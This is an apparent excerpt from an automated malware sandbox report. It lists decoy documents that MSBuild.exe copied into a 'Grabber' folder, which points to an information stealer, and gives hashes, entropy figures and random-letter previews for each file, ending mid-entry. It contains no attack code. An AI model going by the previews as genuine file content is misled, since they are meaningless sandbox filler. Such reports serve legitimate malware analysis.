RPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\IPKGELNTQY\EEGWXUHVUG.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\IPKGELNTQY\GAOBCVIQIJ.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\IPKGELNTQY\IPKGELNTQY.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\IPKGELNTQY\SUAVTZKNFL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\LSBIHQFDVT.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\LSBIHQFDVT.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\MXPXCVPDVN.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\MXPXCVPDVN.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\MXPXCVPDVN\GAOBCVIQIJ.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\MXPXCVPDVN\IPKGELNTQY.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\MXPXCVPDVN\LSBIHQFDVT.pdf

Download File

